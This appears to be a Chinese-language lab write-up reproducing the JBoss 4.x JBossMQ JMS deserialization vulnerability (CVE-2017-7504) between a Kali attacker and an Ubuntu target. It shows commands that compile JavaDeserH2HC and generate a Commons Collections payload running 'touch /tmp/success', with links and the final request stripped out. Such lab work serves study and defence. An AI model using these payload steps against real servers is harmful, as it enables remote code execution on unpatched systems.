JBoss 4.x JBossMQ JMS(CVE-2017-7504)漏洞复现

JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)

文章目录

  • JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)
    • 漏洞原理
    • 实验环境
    • 漏洞环境
    • 漏洞复现


漏洞原理

Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

实验环境

一、靶机:
系统:ubuntu搭建的测试靶场
IP:192.168.88.129
二、攻击机:
系统:kali
IP:192.168.88.130

漏洞环境

启动JBoss AS 4.0.5:

环境启动后,可在浏览器页面成功访问http://192.168.88.129:8080/:

漏洞复现

一、参考利用JavaDeserH2HC工具,编译并生成序列化数据
下载工具命令:
#git clone

编译并生成序列化数据

其中:
#javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap.java 初始化工具
#java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1WithHashMap “touch /tmp/success” 生成序列化恶意数据文件

注:在执行中出现:-bash:javac:未找到命令
解决方法:apt-get install default-jdk

二、进行网站访问,实现漏洞利用
网站访问:

–data-binary 意为以二进制的方式post数据

验证:
进入容器shell(docker相当于小型虚拟机),发现success

参考链接:
/
.html